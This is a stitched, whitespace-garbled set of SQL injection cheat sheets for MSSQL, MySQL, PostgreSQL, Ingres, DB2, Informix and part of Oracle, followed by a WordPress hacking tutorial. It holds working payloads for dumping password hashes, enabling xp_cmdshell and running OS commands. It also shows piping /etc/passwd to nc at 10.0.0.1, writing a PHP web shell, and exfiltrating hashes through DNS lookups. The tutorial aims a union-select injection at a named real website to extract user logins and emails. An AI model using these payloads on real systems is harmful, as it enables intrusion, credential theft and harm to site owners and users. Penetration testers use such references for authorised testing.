Databases SYSAUX Misc Tips In no particular order, here are some suggestions from pentestmonkey readers. From Christian Mehlmauer: Get all tablenamesin one string selectrtrim(xmlagg(xmlelement(e,table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') fromall_tables – whenusingunionbased SQLI withonlyone row BlindSQLIin orderby clause orderby case when((select1fromuser_tableswhere substr(lower(table_name),1,1) = ‘a’and rownum= 1)=1) thencolumn_name1else column_name2end — youmust know2 columnnameswiththe same datatype
MSSQLInjectionCheat Sheet Some useful syntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT @@version Comments SELECT 1 — comment SELECT /*comment*/1 CurrentUser SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROMmaster..sysprocessesWHEREspid= @@SPID List Users SELECT name FROMmaster..syslogins List Password Hashes SELECT name,passwordFROMmaster..sysxlogins — priv,mssql 2000; SELECT name,master.dbo.fn_varbintohexstr(password) FROMmaster..sysxlogins — priv,mssql 2000. Needto converttohex to returnhashesinMSSQL errormessage / some versionof queryanalyzer. SELECT name,password_hashFROMmaster.sys.sql_logins — priv,mssql 2005; SELECT name + ‘-’+ master.sys.fn_varbintohexstr(password_hash) from
master.sys.sql_logins — priv,mssql 2005 Password Cracker MSSQL 2000 and 2005 Hashesare bothSHA1-based. phrasen|dreschercancrack these. List Privileges – currentprivson a particularobjectin2005, 2008 SELECT permission_nameFROMmaster..fn_my_permissions(null,‘DATABASE’); — currentdatabase SELECT permission_nameFROMmaster..fn_my_permissions(null,‘SERVER’); — currentserver SELECT permission_nameFROMmaster..fn_my_permissions(‘master..syslogins’, ‘OBJECT’);–permissionsona table SELECT permission_nameFROMmaster..fn_my_permissions(‘sa’,‘USER’); –permissions on a user– current privs in 2005, 2008 SELECT is_srvrolemember(‘sysadmin’); SELECT is_srvrolemember(‘dbcreator’); SELECT is_srvrolemember(‘bulkadmin’); SELECT is_srvrolemember(‘diskadmin’); SELECT is_srvrolemember(‘processadmin’); SELECT is_srvrolemember(‘serveradmin’); SELECT is_srvrolemember(‘setupadmin’); SELECT is_srvrolemember(‘securityadmin’); – who has a particular priv? 2005, 2008 SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; List DBA Accounts SELECT is_srvrolemember(‘sysadmin’); — isyouraccounta sysadmin? returns1for true,0 forfalse,NULL for invalidrole. Alsotry‘bulkadmin’,‘systemadmin’andother valuesfromthe documentation SELECT is_srvrolemember(‘sysadmin’,‘sa’); — issaa sysadmin?return1 for true,0 for false,NULLfor invalidrole/username. SELECT name FROM master..sysloginsWHEREsysadmin= ’1′ — testedon2005
CurrentDatabase SELECT DB_NAME() List Databases SELECT name FROMmaster..sysdatabases; SELECT DB_NAME(N);— forN = 0, 1, 2, … List Columns SELECT name FROMsyscolumnsWHEREid = (SELECT id FROMsysobjectsWHERE name = ‘mytable’);— forthe currentDB only SELECT master..syscolumns.name,TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns,master..sysobjectsWHERE master..syscolumns.id=master..sysobjects.idAND master..sysobjects.name=’sometable’; — listcolumnamesandtypesfor master..sometable List Tables SELECT name FROMmaster..sysobjectsWHERExtype =‘U’; — use xtype = ‘V’for views SELECT name FROMsomeotherdb..sysobjectsWHERExtype = ‘U’; SELECT master..syscolumns.name,TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns,master..sysobjectsWHERE master..syscolumns.id=master..sysobjects.idAND master..sysobjects.name=’sometable’; — listcolumnamesandtypesfor master..sometable FindTablesFrom ColumnName – NB:This example worksonlyforthe currentdatabase. If youwan’tto search anotherdb,you needtospecifythe db name (e.g.replace sysobjectwith mydb..sysobjects). SELECT sysobjects.name astablename,syscolumns.name ascolumnnameFROM sysobjectsJOIN syscolumnsON sysobjects.id=syscolumns.idWHEREsysobjects.xtype = ‘U’ ANDsyscolumns.name LIKE‘%PASSWORD%’ — thisliststable,columnforeach columncontainingthe word‘password’ SelectNthRow SELECT TOP1 name FROM(SELECT TOP 9 name FROMmaster..sysloginsORDERBY name ASC) sq ORDER BY name DESC — gets9th row SelectNthChar SELECT substring(‘abcd’,3,1) — returnsc Bitwise AND SELECT 6 & 2 — returns2 SELECT 6 & 1 — returns0 ASCIIValue -> Char SELECT char(0×41) — returnsA
Char -> ASCII Value SELECT ascii(‘A’)–returns65 Casting SELECT CAST(’1′as int); SELECT CAST(1as char) String Concatenation SELECT ‘A’+ ‘B’ – returnsAB If Statement IF (1=1) SELECT 1 ELSE SELECT 2 — returns1 Case Statement SELECT CASEWHEN 1=1 THEN 1 ELSE 2 END — returns1 AvoidingQuotes SELECT char(65)+char(66) — returnsAB Time Delay WAITFORDELAY ’0:0:5′ — pause for5 seconds Make DNS Requests declare @hostvarchar(800); select@host= name FROMmaster..syslogins; exec(‘master..xp_getfiledetails”’+ @host+ ‘c$boot.ini”’); — nonpriv,workson 2000declare @host varchar(800); select@host= name + ‘-’+ master.sys.fn_varbintohexstr(password_hash) +‘.2.pentestmonkey.net’from sys.sql_logins;exec(‘xp_fileexist”’+ @host+ ‘c$boot.ini”’); — priv,workson2005– NB: Concatenationisnotallowedincallstothese SPs,hence whywe have touse @host. Messy butnecessary. – AlsocheckouttheDNStunnel feature of sqlninja Command Execution EXEC xp_cmdshell ‘netuser’; — privOnMSSQL2005 you mayneedto reactivate xp_cmdshell firstasit’s disabledbydefault: EXEC sp_configure ‘show advancedoptions’,1; — priv RECONFIGURE; — priv EXEC sp_configure ‘xp_cmdshell’,1; — priv RECONFIGURE; — priv Local File Access CREATE TABLE mydata (line varchar(8000)); BULK INSERTmydataFROM ‘c:boot.ini’; DROP TABLE mydata; Hostname,IP Address SELECT HOST_NAME() Create Users EXEC sp_addlogin ‘user’,‘pass’;— priv
Drop Users EXEC sp_droplogin ‘user’;— priv Make User DBA EXEC master.dbo.sp_addsrvrolemember ‘user’,‘sysadmin;— priv Locationof DB files EXEC sp_helpdbmaster; –locationof master.mdf EXEC sp_helpdbpubs; –locationof pubs.mdf Default/System Databases northwind model msdb pubs— noton sql server2005 tempdb Misc Tips In no particular order, here are some suggestions from pentestmonkey readers. From Dan Crowley: A way to extract data via SQLi with a MySQL backend From Jeremy Bae: Tip about sp_helpdb – included in table above. From Trip: List DBAs (included in table above now): select name from master..syslogins where sysadmin = ’1′ From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008 – included in table above. Also: To check permissions on multiple database you will have to use the following pattern. USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, ‘DATABASE’) Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax: select permission_name collate database_default FROM fn_my_permissions (NULL, ‘DATABASE’)
MySQL SQL InjectionCheat Sheet Some useful syntax reminders for SQL Injection into MySQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT @@version Comments SELECT 1; #comment SELECT /*comment*/1; CurrentUser SELECT user(); SELECT system_user(); List Users SELECT userFROMmysql.user; — priv List Password Hashes SELECT host,user,passwordFROMmysql.user; — priv PasswordCracker Johnthe Ripperwill crackMySQL passwordhashes. List Privileges SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges; — listuserprivsSELECThost,user,Select_priv, Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv, Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,
Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv, Execute_priv,Repl_slave_priv,Repl_client_privFROMmysql.user;— priv,listuser privsSELECTgrantee,table_schema,privilege_type FROM information_schema.schema_privileges; — listprivsondatabases(schemas)SELECT table_schema,table_name,column_name,privilege_typeFROM information_schema.column_privileges;— listprivsoncolumns List DBA Accounts SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privilegesWHEREprivilege_type =‘SUPER’;SELECThost, userFROMmysql.userWHERESuper_priv= ‘Y’; # priv CurrentDatabase SELECT database() List Databases SELECT schema_name FROMinformation_schema.schemata; — forMySQL >= v5.0 SELECT distinct(db) FROMmysql.db — priv List Columns SELECT table_schema,table_name,column_name FROM information_schema.columnsWHEREtable_schema!=‘mysql’ANDtable_schema!= ‘information_schema’ List Tables SELECT table_schema,table_nameFROMinformation_schema.tablesWHERE table_schema!=‘mysql’ANDtable_schema!=‘information_schema’ FindTablesFrom ColumnName SELECT table_schema,table_name FROMinformation_schema.columnsWHERE column_name =‘username’; — findtable whichhave acolumncalled‘username’ SelectNthRow SELECT host,userFROMuserORDER BY hostLIMIT 1 OFFSET 0; # rows numbered from0 SELECT host,userFROMuserORDER BY host LIMIT 1 OFFSET 1; # rows numbered from0 SelectNthChar SELECT substr(‘abcd’,3,1);# returnsc Bitwise AND SELECT 6 & 2; # returns2 SELECT 6 & 1; # returns0 ASCIIValue -> Char SELECT char(65); # returnsA Char -> ASCII Value SELECT ascii(‘A’);#returns65
Casting SELECT cast(’1′ ASunsignedinteger); SELECT cast(’123′ AS char); String Concatenation SELECT CONCAT(‘A’,'B’);#returnsAB SELECT CONCAT(‘A’,'B’,'C’);#returnsABC If Statement SELECT if(1=1,’foo’,'bar’); — returns‘foo’ Case Statement SELECT CASEWHEN (1=1) THEN ‘A’ELSE ‘B’END; # returnsA AvoidingQuotes SELECT 0×414243; # returnsABC Time Delay SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5);# >= 5.0.12 Make DNS Requests Impossible? Command Execution If mysqld(<5.0) isrunningas root ANDyoucompromise aDBA account youcan execute OScommandsbyuploadingasharedobjectfile into/usr/lib(orsimilar). The .sofile shouldcontainaUser DefinedFunction(UDF). raptor_udf.cexplainsexactly howyou go aboutthis. Remembertocompile forthe targetarchitecture whichmay or may not be the same as your attack platform. Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv,canonlyreadworld-readable files. SELECT * FROMmytable INTOdumpfile‘/tmp/somefile’; — priv,write tofilesystem Hostname,IP Address SELECT @@hostname; Create Users CREATE USER test1IDENTIFIEDBY ‘pass1′; — priv Delete Users DROP USER test1; — priv Make User DBA GRANT ALL PRIVILEGESON *.* TO test1@’%'; — priv Locationof DB files SELECT @@datadir; Default/System information_schema(>=mysql 5.0)
Databases mysql Postgres SQLInjectionCheat Sheet Some useful syntax reminders for SQL Injection into PostgreSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version SELECT version() Comments SELECT 1; –comment SELECT /*comment*/1; CurrentUser SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROMpg_user; SELECT getpgusername(); List Users SELECT usename FROMpg_user
List Password Hashes SELECT usename,passwdFROMpg_shadow — priv Password Cracker MDCrack can crack PostgreSQL’sMD5-basedpasswords. List Privileges SELECT usename,usecreatedb,usesuper,usecatupdFROMpg_user List DBA Accounts SELECT usename FROMpg_userWHERE usesuperISTRUE CurrentDatabase SELECT current_database() List Databases SELECT datname FROMpg_database List Columns SELECT relname,A.attnameFROMpg_classC, pg_namespace N,pg_attribute A, pg_type T WHERE (C.relkind=’r') AND(N.oid=C.relnamespace)AND(A.attrelid=C.oid) AND(A.atttypid=T.oid) AND(A.attnum>0) AND(NOTA.attisdropped) AND (N.nspname ILIKE‘public’) List Tables SELECT c.relname FROMpg_catalog.pg_classcLEFT JOIN pg_catalog.pg_namespacen ON n.oid= c.relnamespaceWHEREc.relkindIN (‘r’,”) ANDn.nspname NOTIN (‘pg_catalog’,‘pg_toast’) ANDpg_catalog.pg_table_is_visible(c.oid) FindTablesFrom ColumnName If you wantto listall the table namesthat containa columnLIKE ‘%password%’:SELECTDISTINCTrelname FROMpg_classC,pg_namespace N, pg_attribute A,pg_type T WHERE (C.relkind=’r') AND(N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND(A.atttypid=T.oid) AND(A.attnum>0) AND(NOT A.attisdropped) AND(N.nspname ILIKE‘public’) ANDattname LIKE‘%password%’; SelectNthRow SELECT usename FROMpg_userORDER BY usename LIMIT 1 OFFSET0; — rows numberedfrom0 SELECT usename FROMpg_userORDER BY usename LIMIT 1 OFFSET1; SelectNthChar SELECT substr(‘abcd’,3,1); — returnsc Bitwise AND SELECT 6 & 2; — returns2 SELECT 6 & 1; –returns 0 ASCIIValue -> Char SELECT chr(65);
Char -> ASCII Value SELECT ascii(‘A’); Casting SELECT CAST(1as varchar); SELECT CAST(’1′as int); String Concatenation SELECT ‘A’||‘B’; — returnsAB If Statement IF statementsonlyseemvalidinsidefunctions,soaren’tmuchuse forSQL injection. See CASEstatementinstead. Case Statement SELECT CASEWHEN (1=1) THEN ‘A’ELSE ‘B’END; — returnsA AvoidingQuotes SELECT CHR(65)||CHR(66); — returnsAB Time Delay SELECT pg_sleep(10);— postgres8.2+ only CREATE OR REPLACE FUNCTION sleep(int) RETURNSintAS‘/lib/libc.so.6′,‘sleep’ language ‘C’STRICT; SELECT sleep(10); –priv,create yourownsleepfunction. Taken fromhere . Make DNS Requests Generallynotpossible inpostgres. Howeverif contrib/dblinkisinstalled(itisn’tby default) itcanbe usedto resolve hostnames(assumingyouhave DBA rights): SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb', 'SELECT version()') RETURNS (result TEXT); Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”. Command Execution CREATE OR REPLACE FUNCTION system(cstring) RETURNSintAS‘/lib/libc.so.6′, ‘system’LANGUAGE‘C’STRICT; — privSELECTsystem(‘cat/etc/passwd|nc10.0.0.1 8080′); — priv,commandsrun as postgres/pgsqlOS-level user Local File Access CREATE TABLE mydata(ttext); COPY mydataFROM‘/etc/passwd’; — priv,canreadfileswhichare readable by postgresOS-level user …’ UNION ALL SELECT t FROMmydata LIMIT 1 OFFSET 1; — getdata back one row at a time …’ UNION ALL SELECT t FROMmydata LIMIT 1 OFFSET 2; — getdata back one row at a time … DROP TABLE mytestmytest;Write toafile: CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’); COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS- level user. Generally you won’t be able to write to the web root, but it’s always work a try. – priv user can also read/write files by mapping libc functions Hostname,IP Address SELECT inet_server_addr(); — returnsdbserverIPaddress(ornull if usinglocal connection) SELECT inet_server_port(); — returnsdbserverIPaddress(ornull if usinglocal connection) Create Users CREATE USER test1PASSWORD‘pass1′; — priv CREATE USER test1PASSWORD‘pass1′ CREATEUSER; — priv,grant some privsatthe same time Drop Users DROP USER test1; — priv Make User DBA ALTER USER test1CREATEUSER CREATEDB; — priv Location of DB files SELECT current_setting(‘data_directory’); — priv SELECT current_setting(‘hba_file’); — priv Default/System Databases template0 template1
Ingres SQL InjectionCheat Sheet Ingres seems to be one of the less common database backends for web applications, so I thought it would be worth installing it and making some notes to make my next Ingres-based web app test a little easier. Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres download page is here. This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn more. This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Version selectdbmsinfo(‘_version’); Comments SELECT 123; — comment select123; /* comment*/ CurrentUser selectdbmsinfo(‘session_user’); selectdbmsinfo(‘system_user’); List Users Firstconnectto iidbdb,then: SELECT name,passwordFROMiiuser;— or SELECT ownFROMiidatabase; Create Users create usertestuserwith password=‘testuser’;–priv
List PasswordHashes Firstconnectto iidbdb,then: selectname,passwordfromiiuser; List Privileges selectdbmsinfo(‘db_admin’); selectdbmsinfo(‘create_table’); selectdbmsinfo(‘create_procedure’); selectdbmsinfo(‘security_priv’); selectdbmsinfo(‘select_syscat’); selectdbmsinfo(‘db_privileges’); selectdbmsinfo(‘current_priv_mask’); List DBA Accounts TODO CurrentDatabase selectdbmsinfo(‘database’); List Databases SELECT name FROMiidatabase; — connecttoiidbdb List Columns selectcolumn_name,column_datatype,table_name,table_ownerfrom iicolumns; List Tables selecttable_name,table_ownerfromiitables; selectrelid,relowner,rellocfromiirelation; selectrelid,relowner,rellocfromiirelationwhere relowner!=‘$ingres’; FindTablesFrom ColumnName SELECT table_name,table_ownerFROMiicolumnsWHEREcolumn_name = ‘value’ SelectNthRow Astoundingly,this doesn’tseemtobe possible! Thisisasclose as you can get:selecttop10 blahfrom table; selectfirst10 blahform table; SelectNthChar selectsubstr(‘abc’,2,1); — returns‘b’ Bitwise AND The function“bit_and”exists,butseemshardtouse. Here’san example of ANDing3and5 together. The resultisa “byte”type withvalue ?01:selectsubstr(bit_and(cast(3asbyte),cast(5as byte)),1,1); ASCIIValue ->Char TODO Char -> ASCIIValue TODO (The “ascii”functionexists,butdoesn’tseemtodowhatI’dexpect.)
Casting selectcast(123 as varchar); selectcast(’123′ as integer); StringConcatenation select‘abc’|| ‘def’; If Statement TODO Case Statement TODO AvoidingQuotes TODO Time Delay ???See HeavyQueries articleforsome ideas. Make DNSRequests TODO CommandExecution Impossible? Local File Access TODO Hostname,IPAddress SELECT dbmsinfo(‘ima_server’) Locationof DB files SELECT dbdev,ckpdev,jnldev,sortdevFROMiidatabase WHEREname = ‘value’ — primarylocationof db SELECT lname FROMiiextendWHEREdname = ‘value’ — extendedlocationof db SELECT are FROM iilocationswhere lname=‘value’ –all area (ie directory) linked witha location Default/System Databases SELECT name FROMiidatabase WHEREown= ‘$ingres’ — connectto iidbdb InstallingLocally The Ingresdatabase can be downloadedforfree from http://esd.ingres.com/ A pre-builtLinux-basedIngresDatabase Servercanbe downloadfrom http://www.vmware.com/appliances/directory/832 Database Client TODO There isa clientcalled“sql”whichcanbe usedforlocal connections(atleast) in the database serverpackage above. Logginginfrom commandline $ su - ingres $ sql iidbdb * selectdbmsinfo(‘_version’);go
Identifyingonthe network TODO The following areas are interesting enough to include on this page, but I haven’t researched them for other databases: Description SQL / Comments BatchingQueriesAllowed? Notvia DBI inPERL. Subsequentstatementsseemtogetignored: selectblahfromtable where foo=1; select… doesn’tmatterthis is ignored. FROM clause mandatedin SELECTs? No. Youdon’t needtoselectform“dual”or anything. The following islegal: select1; UNION supported Yes. Nothingtrickyhere. The followingislegal: select1 unionselect2; Enumerate TablesPrivs selecttable_name,permit_user,permit_typefromiiaccess; Lengthof a string selectlength(‘abc’); — returns3 Rolesand passwords Firstyou needtoconnectto iidbdb,then: selectroleid,rolepassfromiirole; List Database Procedures Firstyou needtoconnectto iidbdb,then: selectdbp_name, dbp_ownerfromiiprocedure; Create Users+ GrantingPrivs Firstyou needtoconnectto iidbdb,then: create userpm withpassword= ‘password’; grant all on currentinstallationtopm;
DB2 SQL InjectionCheat Sheet Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in my experience. When you do find one, though it pays to be prepared… Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on DB2 8.2 under Windows. This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “– priv” at the end of the query. Version selectversionnumber,version_timestampfromsysibm.sysversions; Comments selectblahfromfoo; — commentlike this CurrentUser selectuserfromsysibm.sysdummy1; selectsession_userfromsysibm.sysdummy1; selectsystem_userfromsysibm.sysdummy1; List Users N/A (IthinkDB2 usesOS-level useraccountsforauthentication.)Database authorities(like roles,Ithink) can be listedlikethis: selectgrantee fromsyscat.dbauth; List PasswordHashes N/A (IthinkDB2 usesOS-level useraccountsforauthentication.) List Privileges select* fromsyscat.tabauth; — privson tables
select* fromsyscat.dbauthwhere grantee =currentuser; select* fromsyscat.tabauthwhere grantee =currentuser; select* fromSYSIBM.SYSUSERAUTH – Listdb2 systemprivilegies List DBA Accounts selectname fromSYSIBM.SYSUSERAUTH where SYSADMAUTH= ‘Y’or SYSADMAUTH = ‘G’ CurrentDatabase selectcurrentserverfromsysibm.sysdummy1; List Databases SELECT schemaname FROMsyscat.schemata; List Columns selectname,tbname,coltypefromsysibm.syscolumns; List Tables selectname fromsysibm.systables; FindTablesFrom ColumnName selecttbname fromsysibm.syscolumnswhere name=’username’ SelectNthRow selectname from(SELECT name FROMsysibm.systablesorderby name fetchfirstN+M-1 rowsonly) sqorderby name descfetchfirstN rows only; SelectNthChar SELECT SUBSTR(‘abc’,2,1) FROMsysibm.sysdummy1; — returnsb Bitwise AND Thispage seemstoindicate thatDB2 has no supportforbitwise operators! ASCIIValue ->Char selectchr(65) from sysibm.sysdummy1; — returns‘A’ Char -> ASCIIValue selectascii(‘A’) fromsysibm.sysdummy1; — returns65 Casting SELECT cast(’123′ as integer) FROMsysibm.sysdummy1; SELECT cast(1 as char) FROMsysibm.sysdummy1; StringConcatenation SELECT ‘a’concat ‘b’ concat ‘c’ FROMsysibm.sysdummy1; — returns‘abc’ select‘a’|| ‘b’fromsysibm.sysdummy1; — returns‘ab’
Informix SQL InjectionCheat Sheet Some useful syntax reminders for SQL Injection into Informix databases… Below are some tabulated notes on how to do many of thing you’d normally do via SQL injection. All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows. The Informix download page is here. This post is part of series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working is:  Oracle  MSSQL  MySQL  PostgreSQL  Ingres  DB2  Informix I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Version SELECT DBINFO(‘version’,‘full’) FROMsystablesWHEREtabid= 1; SELECT DBINFO(‘version’,‘server-type’) FROMsystablesWHEREtabid= 1; SELECT DBINFO(‘version’,‘major’),DBINFO(‘version’,‘minor’),DBINFO(‘version’, ‘level’) FROMsystablesWHEREtabid= 1; SELECT DBINFO(‘version’,‘os’) FROMsystablesWHEREtabid= 1; — T=Windows, U=32 bitapp on 32-bitUnix,H=32-bit app runningon64-bit Unix,F=64-bit app runningon64-bit unix Comments select1 FROMsystablesWHEREtabid = 1; — comment CurrentUser SELECT USER FROMsystablesWHERE tabid= 1; selectCURRENT_ROLE FROMsystablesWHEREtabid= 1; List Users selectusername,usertype,passwordfromsysusers; List PasswordHashes TODO
List Privileges selecttabname,grantor,grantee,tabauthFROMsystabauthjoinsystableson systables.tabid=systabauth.tabid; — whichtablesare accessiblebywhichusers selectprocname,owner,grantor,grantee fromsysprocauthjoinsysprocedures on sysprocauth.procid=sysprocedures.procid; — whichproceduresare accessible bywhichusers List DBA Accounts TODO CurrentDatabase SELECT DBSERVERNAMEFROMsystableswhere tabid=1; — servername List Databases selectname,ownerfromsysdatabases; List Columns selecttabname,colname,owner,coltype FROMsyscolumnsjoinsystableson syscolumns.tabid=systables.tabid; List Tables selecttabname,ownerFROMsystables; selecttabname,viewtextFROMsysviews joinsystablesonsystables.tabid= sysviews.tabid; List Stored Procedures selectprocname,ownerFROMsysprocedures; FindTablesFrom ColumnName selecttabname,colname,owner,coltype FROMsyscolumnsjoinsystableson syscolumns.tabid=systables.tabidwhere colnamelike‘%pass%’; SelectNthRow selectfirst1 tabidfrom(selectfirst10 tabidfrom systablesorderbytabid) assq orderby tabiddesc; — selectsthe 10th row SelectNthChar SELECT SUBSTRING(‘ABCD’FROM3 FOR 1) FROM systableswheretabid=1; — returns‘C’ Bitwise AND selectbitand(6,1) fromsystableswhere tabid=1; — returns0 selectbitand(6,2) fromsystableswhere tabid=1; — returns2 ASCIIValue ->Char TODO Char -> ASCIIValue selectascii(‘A’) fromsystableswhere tabid=1; Casting selectcast(’123′ as integer) fromsystableswhere tabid=1; selectcast(1as char) from systableswheretabid=1;
StringConcatenation SELECT ‘A’||‘B’ FROMsystableswhere tabid=1; — returns‘AB’ SELECT concat(‘A’,‘B’) FROMsystableswhere tabid=1; — returns‘AB’ StringLength SELECT tabname,length(tabname), char_length(tabname), octet_length(tabname) fromsystables; If Statement TODO Case Statement selecttabid,case whentabid>10then“High” else ‘Low’endfromsystables; AvoidingQuotes TODO Time Delay TODO Make DNSRequests TODO CommandExecution TODO Local File Access TODO Hostname,IP Address SELECT DBINFO(‘dbhostname’) FROMsystablesWHEREtabid= 1; — hostname Locationof DB files TODO Default/System Databases These are the systemdatabases: sysmaster sysadmin* sysuser* sysutils* * = don’t seem to contain anything / don’t allow readingInstalling Locally You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows. Database ClientThere’s a database client SDK available, but I couldn’t get the demo client working. I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo).Logging in from command line If you get local admin rights on a Windows box and have a GUI logon:
 Click:Start | All Programs| IBMInformix DynamicServer11.50 | someservername. Thiswill give youa commandprompt withvariousEnvironmentvariablessetproperly.  Run dbaccess.exefromyourcommandprompt. Thiswill bringupa text-basedGUIthatallows youto browse databases. The following were set on my test system. This may help if you get command line access, but can’t get a GUI – you’ll need to change “testservername”: set INFORMIXDIR=C:PROGRA~1IBMIBMINF~111.50 set INFORMIXSERVER=testservername set ONCONFIG=ONCONFIG.testservername set PATH=C:PROGRA~1IBMIBMINF~111.50bin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSyste m32Wbem;C:PROGRA~1ibmgsk7bin;C:PROGRA~1ibmgsk7lib;C:Program FilesIBMInformixClien-SDKbin;C:Program Filesibmgsk7bin;C:Program Filesibmgsk7lib set CLASSPATH=C:PROGRA~1IBMIBMINF~111.50extendkrakatoakrakatoa.jar;C:PROGRA~1IBMI BMINF~111.50xtendkrakatoajdbc.jar; set DBTEMP=C:PROGRA~1IBMIBMINF~111.50infxtmp set CLIENT_LOCALE=EN_US.CP1252 set DB_LOCALE=EN_US.8859-1 set SERVER_LOCALE=EN_US.CP1252 set DBLANG=EN_US.CP1252 mode con codepage select=1252 Identifying on the network My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix: $ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all … 1526/tcp open pdap-np? 9088/tcp open unknown 9089/tcp open unknown … TODO How would we identify Informix listening on the network?
WordPress Hacking Tricks I. Hacking WordPress .. (Without Cracking the hashes) you cannot exploit the latest version of wordpress with this .. 3.4.2 .. which was released on 6th - september 2012 Things u need 1) any wordpress sqli dork .. (u can get it from exploit-db.com) 2) knowledge of sqli .. (coz this thread is not about sqli) Lets Start , 1) My Dork There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect.. and the google dork for it is .. Code : inurl:"/?fbconnect_action=myhome" now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites .. 2) now the website im going to use here is .. Code : http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2 > here the parameter userid is vulnerable to sqli .. > so lets see what we can get from the data base .. > im going to change the above URL with this Code : http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3, 4,5,concat(user_login,0x3a,user_email)?,7,8,9,10,11,12+from+wp_users-- > now u can see we got the username with the email id .. > now if i change the above URL to this ..
